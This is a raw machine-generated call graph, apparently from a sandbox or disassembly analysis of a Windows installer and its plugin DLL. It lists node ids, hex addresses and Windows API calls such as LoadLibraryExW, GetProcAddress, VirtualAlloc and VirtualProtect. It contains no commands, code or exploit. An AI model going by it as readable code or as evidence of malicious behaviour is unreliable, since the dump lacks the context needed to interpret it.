401c7c 5010->5016 5011->5010 5012->5016 5013 401cd3 5015 402da6 17 API calls 5013->5015 5014 401c87 5017 402d84 17 API calls 5014->5017 5019 401cd8 5015->5019 5016->5013 5016->5014 5018 401c8c 5017->5018 5020 402d84 17 API calls 5018->5020 5021 402da6 17 API calls 5019->5021 5022 401c98 5020->5022 5023 401ce1 FindWindowExW 5021->5023 5024 401cc3 SendMessageW 5022->5024 5025 401ca5 SendMessageTimeoutW 5022->5025 5026 401d03 5023->5026 5024->5026 5025->5026 5027 4028c4 5028 4028ca 5027->5028 5029 4028d2 FindClose 5028->5029 5030 402c2a 5028->5030 5029->5030 5034 734f2d43 5035 734f2d5b 5034->5035 5036 734f162f 2 API calls 5035->5036 5037 734f2d76 5036->5037 5038 4016cc 5039 402da6 17 API calls 5038->5039 5040 4016d2 GetFullPathNameW 5039->5040 5041 4016ec 5040->5041 5047 40170e 5040->5047 5044 406850 2 API calls 5041->5044 5041->5047 5042 401723 GetShortPathNameW 5043 402c2a 5042->5043 5045 4016fe 5044->5045 5045->5047 5048 40651a lstrcpynW 5045->5048 5047->5042 5047->5043 5048->5047 5049 401e4e GetDC 5050 402d84 17 API calls 5049->5050 5051 401e60 GetDeviceCaps MulDiv ReleaseDC 5050->5051 5052 402d84 17 API calls 5051->5052 5053 401e91 5052->5053 5054 406557 17 API calls 5053->5054 5055 401ece CreateFontIndirectW 5054->5055 5056 402638 5055->5056 5057 402950 5058 402da6 17 API calls 5057->5058 5060 40295c 5058->5060 5059 402972 5062 405fe5 2 API calls 5059->5062 5060->5059 5061 402da6 17 API calls 5060->5061 5061->5059 5063 402978 5062->5063 5085 40600a GetFileAttributesW CreateFileW 5063->5085 5065 402985 5066 402a3b 5065->5066 5069 4029a0 GlobalAlloc 5065->5069 5070 402a23 5065->5070 5067 402a42 DeleteFileW 5066->5067 5068 402a55 5066->5068 5067->5068 5069->5070 5072 4029b9 5069->5072 5071 4032b4 31 API calls 5070->5071 5074 402a30 CloseHandle 5071->5074 5086 4034c2 SetFilePointer 5072->5086 5074->5066 5075 4029bf 5076 4034ac ReadFile 5075->5076 5077 4029c8 GlobalAlloc 5076->5077 5078 4029d8 5077->5078 5079 402a0c 5077->5079 5080 4032b4 31 API calls 5078->5080 5081 4060bc WriteFile 5079->5081 5084 4029e5 5080->5084 5082 402a18 GlobalFree 5081->5082 5082->5070 5083 402a03 GlobalFree 5083->5079 5084->5083 5085->5065 5086->5075 5087 401956 5088 402da6 17 API calls 5087->5088 5089 40195d lstrlenW 5088->5089 5090 402638 5089->5090 4290 4014d7 4295 402d84 4290->4295 4292 4014dd Sleep 4294 402c2a 4292->4294 4296 406557 17 API calls 4295->4296 4297 402d99 4296->4297 4297->4292 5091 734f1058 5092 734f1074 5091->5092 5093 734f10dd 5092->5093 5095 734f1092 5092->5095 5104 734f15b6 5092->5104 5096 734f15b6 GlobalFree 5095->5096 5097 734f10a2 5096->5097 5098 734f10a9 GlobalSize 5097->5098 5099 734f10b2 5097->5099 5098->5099 5100 734f10c7 5099->5100 5101 734f10b6 GlobalAlloc 5099->5101 5103 734f10d2 GlobalFree 5100->5103 5102 734f15dd 3 API calls 5101->5102 5102->5100 5103->5093 5106 734f15bc 5104->5106 5105 734f15c2 5105->5095 5106->5105 5107 734f15ce GlobalFree 5106->5107 5107->5095 4407 4020d8 4408 4020ea 4407->4408 4418 40219c 4407->4418 4409 402da6 17 API calls 4408->4409 4411 4020f1 4409->4411 4410 401423 24 API calls 4416 4022f6 4410->4416 4412 402da6 17 API calls 4411->4412 4413 4020fa 4412->4413 4414 402110 LoadLibraryExW 4413->4414 4415 402102 GetModuleHandleW 4413->4415 4417 402121 4414->4417 4414->4418 4415->4414 4415->4417 4430 406956 4417->4430 4418->4410 4421 402132 4424 402151 4421->4424 4425 40213a 4421->4425 4422 40216b 4423 40557c 24 API calls 4422->4423 4426 402142 4423->4426 4435 734f1817 4424->4435 4427 401423 24 API calls 4425->4427 4426->4416 4428 40218e FreeLibrary 4426->4428 4427->4426 4428->4416 4477 40653c WideCharToMultiByte 4430->4477 4432 406973 4433 40697a GetProcAddress 4432->4433 4434 40212c 4432->4434 4433->4434 4434->4421 4434->4422 4436 734f184a 4435->4436 4478 734f1bff 4436->4478 4438 734f1851 4439 734f1976 4438->4439 4440 734f1869 4438->4440 4441 734f1862 4438->4441 4439->4426 4512 734f2480 4440->4512 4528 734f243e 4441->4528 4446 734f18af 4541 734f2655 4446->4541 4447 734f18cd 4452 734f191e 4447->4452 4453 734f18d3 4447->4453 4448 734f187f 4451 734f1885 4448->4451 4457 734f1890 4448->4457 4449 734f1898 4460 734f188e 4449->4460 4538 734f2e23 4449->4538 4451->4460 4522 734f2b98 4451->4522 4455 734f2655 10 API calls 4452->4455 4560 734f1666 4453->4560 4461 734f190f 4455->4461 4456 734f18b5 4552 734f1654 4456->4552 4532 734f2810 4457->4532 4460->4446 4460->4447 4468 734f1965 4461->4468 4566 734f2618 4461->4566 4466 734f1896 4466->4460 4467 734f2655 10 API calls 4467->4461 4468->4439 4470 734f196f GlobalFree 4468->4470 4470->4439 4474 734f1951 4474->4468 4570 734f15dd wsprintfW 4474->4570 4475 734f194a FreeLibrary 4475->4474 4477->4432 4573 734f12bb GlobalAlloc 4478->4573 4480 734f1c26 4574 734f12bb GlobalAlloc 4480->4574 4482 734f1e6b GlobalFree GlobalFree GlobalFree 4483 734f1e88 4482->4483 4502 734f1ed2 4482->4502 4485 734f227e 4483->4485 4493 734f1e9d 4483->4493 4483->4502 4484 734f1d26 GlobalAlloc 4499 734f1c31 4484->4499 4486 734f22a0 GetModuleHandleW 4485->4486 4485->4502 4489 734f22c6 4486->4489 4490 734f22b1 LoadLibraryW 4486->4490 4487 734f1d71 lstrcpyW 4492 734f1d7b lstrcpyW 4487->4492 4488 734f1d8f GlobalFree 4488->4499 4581 734f16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4489->4581 4490->4489 4490->4502 4492->4499 4493->4502 4577 734f12cc 4493->4577 4494 734f2318 4498 734f2325 lstrlenW 4494->4498 4494->4502 4495 734f2126 4580 734f12bb GlobalAlloc 4495->4580 4582 734f16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4498->4582 4499->4482 4499->4484 4499->4487 4499->4488 4499->4492 4499->4495 4500 734f2067 GlobalFree 4499->4500 4501 734f21ae 4499->4501 4499->4502 4505 734f12cc 2 API calls 4499->4505 4506 734f1dcd 4499->4506 4500->4499 4501->4502 4509 734f2216 lstrcpyW 4501->4509 4502->4438 4503 734f22d8 4503->4494 4510 734f2302 GetProcAddress 4503->4510 4505->4499 4506->4499 4575 734f162f GlobalSize GlobalAlloc 4506->4575 4507 734f233f 4507->4502 4509->4502 4510->4494 4511 734f212f 4511->4438 4519 734f2498 4512->4519 4513 734f12cc GlobalAlloc lstrcpynW 4513->4519 4515 734f25c1 GlobalFree 4516 734f186f 4515->4516 4515->4519 4516->4448 4516->4449 4516->4460 4517 734f256b GlobalAlloc CLSIDFromString 4517->4515 4518 734f2540 GlobalAlloc WideCharToMultiByte 4518->4515 4519->4513 4519->4515 4519->4517 4519->4518 4521 734f258a 4519->4521 4584 734f135a 4519->4584 4521->4515 4588 734f27a4 4521->4588 4524 734f2baa 4522->4524 4523 734f2c4f CloseHandle 4527 734f2c6d 4523->4527 4524->4523 4526 734f2d39 4526->4460 4591 734f2b42 4527->4591 4529 734f2453 4528->4529 4530 734f245e GlobalAlloc 4529->4530 4531 734f1868 4529->4531 4530->4529 4531->4440 4536 734f2840 4532->4536 4533 734f28ee 4535 734f28f4 GlobalSize 4533->4535 4537 734f28fe 4533->4537 4534 734f28db GlobalAlloc 4534->4537 4535->4537 4536->4533 4536->4534 4537->4466 4539 734f2e2e 4538->4539 4540 734f2e6e GlobalFree 4539->4540 4595 734f12bb GlobalAlloc 4541->4595 4543 734f270b lstrcpynW 4549 734f265f 4543->4549 4544 734f26fa StringFromGUID2 4544->4549 4545 734f26d8 MultiByteToWideChar 4545->4549 4546 734f271e wsprintfW 4546->4549 4547 734f2742 GlobalFree 4547->4549 4548 734f2777 GlobalFree 4548->4456 4549->4543 4549->4544 4549->4545 4549->4546 4549->4547 4549->4548 4550 734f1312 2 API calls 4549->4550 4596 734f1381 4549->4596 4550->4549 4600 734f12bb GlobalAlloc 4552->4600 4554 734f1659 4555 734f1666 2 API calls 4554->4555 4556 734f1663 4555->4556 4557 734f1312 4556->4557 4558 734f131b GlobalAlloc lstrcpynW 4557->4558 4559 734f1355 GlobalFree 4557->4559 4558->4559 4559->4461 4561 734f169f lstrcpyW 4560->4561 4562 734f1672 wsprintfW 4560->4562 4565 734f16b8 4561->4565 4562->4565 4565->4467 4567 734f2626 4566->4567 4569 734f1931 4566->4569 4568 734f2642 GlobalFree 4567->4568 4567->4569 4568->4567 4569->4474 4569->4475 4571 734f1312 2 API calls 4570->4571 4572 734f15fe 4571->4572 4572->4468 4573->4480 4574->4499 4576 734f164d 4575->4576 4576->4506 4583 734f12bb GlobalAlloc 4577->4583 4579 734f12db lstrcpynW 4579->4502 4580->4511 4581->4503 4582->4507 4583->4579 4585 734f1361 4584->4585 4586 734f12cc 2 API calls 4585->4586 4587 734f137f 4586->4587 4587->4519 4589 734f2808 4588->4589 4590 734f27b2 VirtualAlloc 4588->4590 4589->4521 4590->4589 4592 734f2b4d 4591->4592 4593 734f2b5d 4592->4593 4594 734f2b52 GetLastError 4592->4594 4593->4526 4594->4593 4595->4549 4597 734f13ac 4596->4597 4598 734f138a 4596->4598 4597->4549 4598->4597 4599 734f1390 lstrcpyW 4598->4599 4599->4597 4600->4554 5108 402b59 5109 402b60 5108->5109 5110 402bab 5108->5110 5113 402d84 17 API calls 5109->5113 5114 402ba9 5109->5114 5111 4068e7 5 API calls 5110->5111 5112 402bb2 5111->5112 5115 402da6 17 API calls 5112->5115 5116 402b6e 5113->5116 5117 402bbb 5115->5117 5118 402d84 17 API calls 5116->5118 5117->5114 5119 402bbf IIDFromString 5117->5119 5121 402b7a 5118->5121 5119->5114 5120 402bce 5119->5120 5120->5114 5126 40651a lstrcpynW 5120->5126 5125 406461 wsprintfW 5121->5125 5124 402beb CoTaskMemFree 5124->5114 5125->5114 5126->5124 5127 402a5b 5128 402d84 17 API calls 5127->5128 5129 402a61 5128->5129 5130 402aa4 5129->5130 5131 402a88 5129->5131 5136 40292e 5129->5136 5134 402abe 5130->5134 5135 402aae 5130->5135 5132 402a8d 5131->5132 5133 402a9e 5131->5133 5141 40651a lstrcpynW 5132->5141 5142 406461 wsprintfW 5133->5142 5137 406557 17 API calls 5134->5137 5138 402d84 17 API calls 5135->5138 5137->5136 5138->5136 5141->5136 5142->5136 4950 40175c 4951 402da6 17 API calls 4950->4951 4952 401763 4951->4952 4953 406039 2 API calls 4952->4953 4954 40176a 4953->4954 4955 406039 2 API calls 4954->4955 4955->4954 5143 401d5d 5144 402d84 17 API calls 5143->5144 5145 401d6e SetWindowLongW 5144->5145 5146 402c2a 5145->5146 4956 401ede 4957 402d84 17 API calls 4956->4957 4958 401ee4 4957->4958 4959 402d84 17 API calls 4958->4959 4960 401ef0 4959->4960 4961 401f07 EnableWindow 4960->4961 4962 401efc ShowWindow 4960->4962 4963 402c2a 4961->4963 4962->4963 5147 4028de 5148 4028e6 5147->5148 5149 4028ea FindNextFileW 5148->5149 5151 4028fc 5148->5151 5150 402943 5149->5150 5149->5151 5153 40651a lstrcpynW 5150->5153 5153->5151 5154 404ee3 GetDlgItem GetDlgItem 5155 404f35 7 API calls 5154->5155 5159 40515a 5154->5159 5156 404fdc DeleteObject 5155->5156 5157 404fcf SendMessageW 5155->5157 5158 404fe5 5156->5158 5157->5156 5160 40501c 5158->5160 5161 406557 17 API calls 5158->5161 5169 40523c 5159->5169 5188 4051c9 5159->5188 5208 404e31 SendMessageW 5159->5208 5162 404476 18 API calls 5160->5162 5166 404ffe SendMessageW SendMessageW 5161->5166 5167 405030 5162->5167 5163 4052e8 5164 4052f2 SendMessageW 5163->5164 5165 4052fa 5163->5165 5164->5165 5176 405313 5165->5176 5177 40530c ImageList_Destroy 5165->5177 5185 405323 5165->5185 5166->5158 5173 404476 18 API calls 5167->5173 5168 40514d 5171 4044dd 8 API calls 5168->5171 5169->5163 5169->5168 5174 405295 SendMessageW 5169->5174 5170 40522e SendMessageW 5170->5169 5175 4054e9 5171->5175 5189 405041 5173->5189 5174->5168 5179 4052aa SendMessageW 5174->5179 5180 40531c GlobalFree 5176->5180 5176->5185 5177->5176 5178 40549d 5178->5168 5183 4054af ShowWindow GetDlgItem ShowWindow 5178->5183 5182 4052bd 5179->5182 5180->5185 5181 40511c GetWindowLongW SetWindowLongW 5184 405135 5181->5184 5190 4052ce SendMessageW 5182->5190 5183->5168 5186 405152 5184->5186 5187 40513a ShowWindow 5184->5187 5185->5178 5201 40535e 5185->5201 5213 404eb1 5185->5213 5207 4044ab SendMessageW 5186->5207 5206 4044ab SendMessageW 5187->5206 5188->5169 5188->5170 5189->5181 5191 405117 5189->5191 5194 405094 SendMessageW 5189->5194 5195 4050d2 SendMessageW 5189->5195 5196 4050e6 SendMessageW 5189->5196 5190->5163 5191->5181 5191->5184 5194->5189 5195->5189 5196->5189 5198 405468 5199 405473 InvalidateRect 5198->5199 5202 40547f 5198->5202 5199->5202 5200 40538c SendMessageW 5204 4053a2 5200->5204 5201->5200 5201->5204 5202->5178 5222 404dec 5202->5222 5203 405416 SendMessageW SendMessageW 5203->5204 5204->5198 5204->5203 5206->5168 5207->5159 5209 404e90 SendMessageW 5208->5209 5210 404e54 GetMessagePos ScreenToClient SendMessageW 5208->5210 5211 404e88 5209->5211 5210->5211 5212 404e8d 5210->5212 5211->5188 5212->5209 5225 40651a lstrcpynW 5213->5225 5215 404ec4 5226 406461 wsprintfW 5215->5226 5217 404ece 5218 40140b 2 API calls 5217->5218 5219 404ed7 5218->5219 5227 40651a lstrcpynW 5219->5227 5221 404ede 5221->5201 5228 404d23 5222->5228 5224 404e01 5224->5178 5225->5215 5226->5217 5227->5221 5231 404d3c 5228->5231 5229 406557 17 API calls 5230 404da0 5229->5230 5232 406557 17 API calls 5230->5232 5231->5229 5233 404dab 5232->5233 5234 406557 17 API calls 5233->5234 5235 404dc1 lstrlenW wsprintfW SetDlgItemTextW 5234->5235 5235->5224 5236 401563 5237 402ba4 5236->5237 5240 406461 wsprintfW 5237->5240 5239 402ba9 5240->5239 5241 734f23e9 5242 734f2453 5241->5242 5243 734f245e GlobalAlloc 5242->5243 5244 734f247d 5242->5244 5243->5242 5245 4045e6 lstrlenW 5246 404605 5245->5246 5247 404607 WideCharToMultiByte 5245->5247 5246->5247 5248 404967 5249 404993 5248->5249 5250 4049a4 5248->5250 5309 405b5e GetDlgItemTextW 5249->5309 5251 4049b0 GetDlgItem 5250->5251 5259 404a0f 5250->5259 5257 4049c4 5251->5257 5253 40499e 5254 4067a1 5 API calls 5253->5254 5254->5250 5255 404af3 5258 404ca2 5255->5258 5311 405b5e GetDlgItemTextW 5255->5311 5256 4049d8 SetWindowTextW 5263 404476 18 API calls 5256->5263 5257->5256 5262 405e94 4 API calls 5257->5262 5261 4044dd 8 API calls 5258->5261 5259->5255 5259->5258 5264 406557 17 API calls 5259->5264 5266 404cb6 5261->5266 5267 4049ce 5262->5267 5268 4049f4 5263->5268 5269 404a83 SHBrowseForFolderW 5264->5269 5265 404b23 5270 405ef1 18 API calls 5265->5270 5267->5256 5274 405de9 3 API calls 5267->5274 5271 404476 18 API calls 5268->5271 5269->5255 5272 404a9b CoTaskMemFree 5269->5272 5273 404b29 5270->5273 5275 404a02 5271->5275 5276 405de9 3 API calls 5272->5276 5312 40651a lstrcpynW 5273->5312 5274->5256 5310 4044ab SendMessageW 5275->5310 5279 404aa8 5276->5279 5281 404adf SetDlgItemTextW 5279->5281 5285 406557 17 API calls 5279->5285 5280 404a08 5283 4068e7 5 API calls 5280->5283 5281->5255 5282 404b40 5284 4068e7 5 API calls 5282->5284 5283->5259 5292 404b47 5284->5292 5286 404ac7 lstrcmpiW 5285->5286 5286->5281 5288 404ad8 lstrcatW 5286->5288 5287 404b88 5313 40651a lstrcpynW 5287->5313 5288->5281 5290 404b8f 5291 405e94 4 API calls 5290->5291 5293 404b95 GetDiskFreeSpaceW 5291->5293 5292->5287 5296 405e35 2 API calls 5292->5296 5297 404be0 5292->5297 5295 404bb9 MulDiv 5293->5295 5293->5297 5295->5297 5296->5292 5298 404c51 5297->5298 5299 404dec 20 API calls 5297->5299 5300 404c74 5298->5300 5302 40140b 2 API calls 5298->5302 5301 404c3e 5299->5301 5314 404498 KiUserCallbackDispatcher 5300->5314 5303 404c53 SetDlgItemTextW 5301->5303 5304 404c43 5301->5304 5302->5300 5303->5298 5306 404d23 20 API calls 5304->5306 5306->5298 5307 404c90 5307->5258 5315 4048c0 5307->5315 5309->5253 5310->5280 5311->5265 5312->5282 5313->5290 5314->5307 5316 4048d3 SendMessageW 5315->5316 5317 4048ce 5315->5317 5316->5258 5317->5316 5318 401968 5319 402d84 17 API calls 5318->5319 5320 40196f 5319->5320 5321 402d84 17 API calls 5320->5321 5322 40197c 5321->5322 5323 402da6 17 API calls 5322->5323 5324 401993 lstrlenW 5323->5324 5326 4019a4 5324->5326 5325 4019e5 5326->5325 5330 40651a lstrcpynW 5326->5330 5328 4019d5 5328->5325 5329 4019da lstrlenW 5328->5329 5329->5325 5330->5328 5331 40166a 5332 402da6 17 API calls 5331->5332 5333 401670 5332->5333 5334 406850 2 API calls 5333->5334 5335 401676 5334->5335 5336 402aeb 5337 402d84 17 API calls 5336->5337 5338 402af1 5337->5338 5339 406557 17 API calls 5338->5339 5340 40292e 5338->5340 5339->5340 5341 4026ec 5342 402d84 17 API calls 5341->5342 5344 4026fb 5342->5344 5343 402838 5344->5343 5345 402745 ReadFile 5344->5345 5346 40608d ReadFile 5344->5346 5348 402785 MultiByteToWideChar 5344->5348 5349 40283a 5344->5349 5351 4027ab SetFilePointer MultiByteToWideChar 5344->5351 5352 40284b 5344->5352 5354 4060eb SetFilePointer 5344->5354 5345->5343 5345->5344 5346->5344 5348->5344 5363 406461 wsprintfW 5349->5363 5351->5344 5352->5343 5353 40286c SetFilePointer 5352->5353 5353->5343 5355 406107 5354->5355 5362 40611f 5354->5362 5356 40608d ReadFile 5355->5356 5357 406113 5356->5357 5358 406150 SetFilePointer 5357->5358 5359 406128 SetFilePointer 5357->5359 5357->5362 5358->5362 5359->5358 5360 406133 5359->5360 5361 4060bc WriteFile 5360->5361 5361->5362 5362->5344 5363->5343 5364 734f10e1 5370 734f1111 5364->5370 5365 734f12b0 GlobalFree 5366 734f11d7 GlobalAlloc 5366->5370 5367 734f1240 GlobalFree 5367->5370 5368 734f135a 2 API calls 5368->5370 5369 734f12ab 5369->5365 5370->5365 5370->5366 5370->5367 5370->5368 5370->5369 5371 734f1312 2 API calls 5370->5371 5372 734f129a GlobalFree 5370->5372 5373 734f116b GlobalAlloc 5370->5373 5374 734f1381 lstrcpyW 5370->5374 5371->5370 5372->5370 5373->5370 5374->5370 4964 40176f 4965 402da6 17 API calls 4964->4965 4966 401776 4965->4966 4967 401796 4966->4967 4968 40179e 4966->4968 5003 40651a lstrcpynW 4967->5003 5004 40651a lstrcpynW 4968->5004 4971 40179c 4975 4067a1 5 API calls 4971->4975 4972 4017a9 4973 405de9 3 API calls 4972->4973 4974 4017af lstrcatW 4973->4974 4974->4971 4992 4017bb 4975->4992 4976 406850 2 API calls 4976->4992 4977 405fe5 2 API calls 4977->4992 4979 4017cd CompareFileTime 4979->4992 4980 40188d 4981 40557c 24 API calls 4980->4981 4984 401897 4981->4984 4982 40557c 24 API calls 4991 401879 4982->4991 4983 40651a lstrcpynW 4983->4992 4985 4032b4 31 API calls 4984->4985 4986 4018aa 4985->4986 4987 4018be SetFileTime 4986->4987 4988 4018d0 CloseHandle 4986->4988 4987->4988 4990 4018e1 4988->4990 4988->4991 4989 406557 17 API calls 4989->4992 4993 4018e6 4990->4993 4994 4018f9 4990->4994 4992->4976 4992->4977 4992->4979 4992->4980 4992->4983 4992->4989 4997 405b7a MessageBoxIndirectW 4992->4997 5000 401864 4992->5000 5002 40600a GetFileAttributesW CreateFileW 4992->5002 4995 406557 17 API calls 4993->4995 4996 406557 17 API calls 4994->4996 4998 4018ee lstrcatW 4995->4998 4999 401901 4996->4999 4997->4992 4998->4999 4999->4991 5001 405b7a MessageBoxIndirectW 4999->5001 5000->4982 5000->4991 5001->4991 5002->4992 5003->4971 5004->4972 4053 734f2a7f 4054 734f2acf 4053->4054 4055 734f2a8f VirtualProtect 4053->4055 4055->4054 5375 4054f0 5376 405500 5375->5376 5377 405514 5375->5377 5378 405506 5376->5378 5379 40555d 5376->5379 5380 40551c IsWindowVisible 5377->5380 5386 405533 5377->5386 5382 4044c2 SendMessageW 5378->5382 5381 405562 CallWindowProcW 5379->5381 5380->5379 5383 405529 5380->5383 5384 405510 5381->5384 5382->5384 5385 404e31 5 API calls 5383->5385 5385->5386 5386->5381 5387 404eb1 4 API calls 5386->5387 5387->5379 5388 401a72 5389 402d84 17 API calls 5388->5389 5390 401a7b 5389->5390 5391 402d84 17 API calls 5390->5391 5392 401a20 5391->5392 5393 401573 5394 401583 ShowWindow 5393->5394 5395 40158c 5393->5395 5394->5395 5396 402c2a 5395->5396 5397 40159a ShowWindow 5395->5397 5397->5396 5398 4023f4 5399 402da6 17 API calls 5398->5399 5400 402403 5399->5400 5401 402da6 17 API calls 5400->5401 5402 40240c 5401->5402 5403 402da6 17 API calls 5402->5403 5404 402416 GetPrivateProfileStringW 5403->5404 5405 4014f5 SetForegroundWindow 5406 402c2a 5405->5406 5407 734f1979 5409 734f199c 5407->5409 5408 734f19e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5411 734f1312 2 API calls 5408->5411 5409->5408 5410 734f19d1 GlobalFree 5409->5410 5410->5408 5412 734f1b6e GlobalFree GlobalFree 5411->5412 5413 401ff6 5414 402da6 17 API calls 5413->5414 5415 401ffd 5414->5415 5416 406850 2 API calls 5415->5416 5417 402003 5416->5417 5419 402014 5417->5419 5420 406461 wsprintfW 5417->5420 5420->5419 4298 403f77 4299 4040f0 4298->4299 4300 403f8f 4298->4300 4301 404101 GetDlgItem GetDlgItem 4299->4301 4302 404141 4299->4302 4300->4299 4303 403f9b 4300->4303 4304 404476 18 API calls 4301->4304 4305 40419b 4302->4305 4317 401389 2 API calls 4302->4317 4306 403fa6 SetWindowPos 4303->4306 4307 403fb9 4303->4307 4310 40412b SetClassLongW 4304->4310 4362 4040eb 4305->4362 4371 4044c2 4305->4371 4306->4307 4308 403fc2 ShowWindow 4307->4308 4309 404004 4307->4309 4312 403fe2 GetWindowLongW 4308->4312 4313 4040dd 4308->4313 4314 404023 4309->4314 4315 40400c DestroyWindow 4309->4315 4316 40140b 2 API calls 4310->4316 4312->4313 4318 403ffb ShowWindow 4312->4318 4393 4044dd 4313->4393 4319 404028 SetWindowLongW 4314->4319 4320 404039 4314->4320 4370 4043ff 4315->4370 4316->4302 4321 404173 4317->4321 4318->4309 4319->4362 4320->4313 4325 404045 GetDlgItem 4320->4325 4321->4305 4326 404177 SendMessageW 4321->4326 4323 40140b 2 API calls 4360 4041ad 4323->4360 4324 404401 DestroyWindow EndDialog 4324->4370 4328 404073 4325->4328 4329 404056 SendMessageW IsWindowEnabled 4325->4329 4326->4362 4327 404430 ShowWindow 4327->4362 4331 404080 4328->4331 4332 404093 4328->4332 4333 4040c7 SendMessageW 4328->4333 4341 404078 4328->4341 4329->4328 4329->4362 4330 406557 17 API calls 4330->4360 4331->4333 4331->4341 4336 4040b0 4332->4336 4337 40409b 4332->4337 4333->4313 4335 404476 18 API calls 4335->4360 4340 40140b 2 API calls 4336->4340 4387 40140b 4337->4387 4338 4040ae 4338->4313 4342 4040b7 4340->4342 4390 40444f 4341->4390 4342->4313 4342->4341 4344 404228 GetDlgItem 4345 404245 ShowWindow KiUserCallbackDispatcher 4344->4345 4346 40423d 4344->4346 4377 404498 KiUserCallbackDispatcher 4345->4377 4346->4345 4348 40426f EnableWindow 4353 404283 4348->4353 4349 404288 GetSystemMenu EnableMenuItem SendMessageW 4350 4042b8 SendMessageW 4349->4350 4349->4353 4350->4353 4353->4349 4378 4044ab SendMessageW 4353->4378 4379 403f58 4353->4379 4382 40651a lstrcpynW 4353->4382 4355 4042e7 lstrlenW 4356 406557 17 API calls 4355->4356 4357 4042fd SetWindowTextW 4356->4357 4383 401389 4357->4383 4359 404341 DestroyWindow 4361 40435b CreateDialogParamW 4359->4361 4359->4370 4360->4323 4360->4324 4360->4330 4360->4335 4360->4359 4360->4362 4374 404476 4360->4374 4363 40438e 4361->4363 4361->4370 4364 404476 18 API calls 4363->4364 4365 404399 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4364->4365 4366 401389 2 API calls 4365->4366 4367 4043df 4366->4367 4367->4362 4368 4043e7 ShowWindow 4367->4368 4369 4044c2 SendMessageW 4368->4369 4369->4370 4370->4327 4370->4362 4372 4044da 4371->4372 4373 4044cb SendMessageW 4371->4373 4372->4360 4373->4372 4375 406557 17 API calls 4374->4375 4376 404481 SetDlgItemTextW 4375->4376 4376->4344 4377->4348 4378->4353 4380 406557 17 API calls 4379->4380 4381 403f66 SetWindowTextW 4380->4381 4381->4353 4382->4355 4385 401390 4383->4385 4384 4013fe 4384->4360 4385->4384 4386 4013cb MulDiv SendMessageW 4385->4386 4386->4385 4388 401389 2 API calls 4387->4388 4389 401420 4388->4389 4389->4341 4391 404456 4390->4391 4392 40445c SendMessageW 4390->4392 4391->4392 4392->4338 4394 4044f5 GetWindowLongW 4393->4394 4395 4045a0 4393->4395 4394->4395 4396 40450a 4394->4396 4395->4362 4396->4395 4397 404537 GetSysColor 4396->4397 4398 40453a 4396->4398 4397->4398 4399 404540 SetTextColor 4398->4399 4400 40454a SetBkMode 4398->4400 4399->4400 4401 404562 GetSysColor 4400->4401 4402 404568 4400->4402 4401->4402 4403 404579 4402->4403 4404 40456f SetBkColor 4402->4404 4403->4395 4405 404593 CreateBrushIndirect 4403->4405 4406 40458c DeleteObject 4403->4406 4404->4403 4405->4395 4406->4405 5421 401b77 5422 402da6 17 API calls 5421->5422 5423 401b7e 5422->5423 5424 402d84 17 API calls 5423->5424 5425 401b87 wsprintfW 5424->5425 5426 402c2a 5425->5426 5427 734f1774 5428 734f17a3 5427->5428 5429 734f1bff 22 API calls 5428->5429 5430 734f17aa 5429->5430 5431 734f17bd 5430->5431 5432 734f17b1 5430->5432 5433 734f17c7 5431->5433 5434 734f17e4 5431->5434 5435 734f1312 2 API calls 5432->5435 5437 734f15dd 3 API calls 5433->5437 5438 734f180e 5434->5438 5439 734f17ea 5434->5439 5436 734f17bb 5435->5436 5441 734f17cc 5437->5441 5440 734f15dd 3 API calls 5438->5440 5442 734f1654 3 API calls 5439->5442 5440->5436 5443 734f1654 3 API calls 5441->5443 5444 734f17ef 5442->5444 5445 734f17d2 5443->5445 5446 734f1312 2 API calls 5444->5446 5447 734f1312 2 API calls 5445->5447 5448 734f17f5 GlobalFree 5446->5448 5449 734f17d8 GlobalFree 5447->5449 5448->5436 5450 734f1809 GlobalFree 5448->5450 5449->5436 5450->5436 5451 40167b 5452 402da6 17 API calls 5451->5452 5453 401682 5452->5453 5454 402da6 17 API calls 5453->5454 5455 40168b 5454->5455 5456 402da6 17 API calls 5455->5456 5457 401694 MoveFileW 5456->5457 5458 4016a0 5457->5458 5459 4016a7 5457->5459 5460 401423 24 API calls 5458->5460 5461 406850 2 API calls 5459->5461 5463 4022f6 5459->5463 5460->5463 5462 4016b6 5461->5462 5462->5463 5464 4062da 36 API calls 5462->5464 5464->5458 5465 4022ff 5466 402da6 17 API calls 5465->5466 5467 402305 5466->5467 5468 402da6 17 API calls 5467->5468 5469 40230e 5468->5469 5470 402da6 17 API calls 5469->5470 5471 402317 5470->5471 5472 406850 2 API calls 5471->5472 5473 402320 5472->5473 5474 402331 lstrlenW lstrlenW 5473->5474 5475 402324 5473->5475 5477 40557c 24 API calls 5474->5477 5476 40557c 24 API calls 5475->5476 5478 40232c 5475->5478 5476->5478 5479 40236f SHFileOperationW 5477->5479 5479->5475 5479->5478 5480 4019ff 5481 402da6 17 API calls 5480->5481 5482 401a06 5481->5482 5483 402da6 17 API calls 5482->5483 5484 401a0f 5483->5484 5485 401a16 lstrcmpiW 5484->5485 5486 401a28 lstrcmpW 5484->5486 5487 401a1c 5485->5487 5486->5487 5488 401000 5489 401037 BeginPaint GetClientRect 5488->5489 5490 40100c DefWindowProcW 5488->5490 5492 4010f3 5489->5492 5495 401179 5490->5495 5493 401073 CreateBrushIndirect FillRect DeleteObject 5492->5493 5494 4010fc 5492->5494 5493->5492 5496 401102 CreateFontIndirectW 5494->5496 5497 401167 EndPaint 5494->5497 5496->5497 5498 401112 6 API calls 5496->5498 5497->5495 5498->5497 5499 401d81 5500 401d94 GetDlgItem 5499->5500 5501 401d87 5499->5501 5502 401d8e 5500->5502 5503 402d84 17 API calls 5501->5503 5504 401dd5 GetClientRect LoadImageW SendMessageW 5502->5504 5505 402da6 17 API calls 5502->5505 5503->5502 5507 401e33 5504->5507 5509 401e3f 5504->5509 5505->5504 5508 401e38 DeleteObject 5507->5508 5507->5509 5508->5509 5510 734f170d 5511 734f15b6 GlobalFree 5510->5511 5514 734f1725 5511->5514 5512 734f176b GlobalFree 5513 734f1740 5513->5512 5514->5512 5514->5513 5515 734f1757 VirtualFree 5514->5515 5515->5512 5516 401503 5517 40150b 5516->5517 5519 40151e 5516->5519 5518 402d84 17 API calls 5517->5518 5518->5519 5520 402383 5521 40238a 5520->5521 5524 40239d 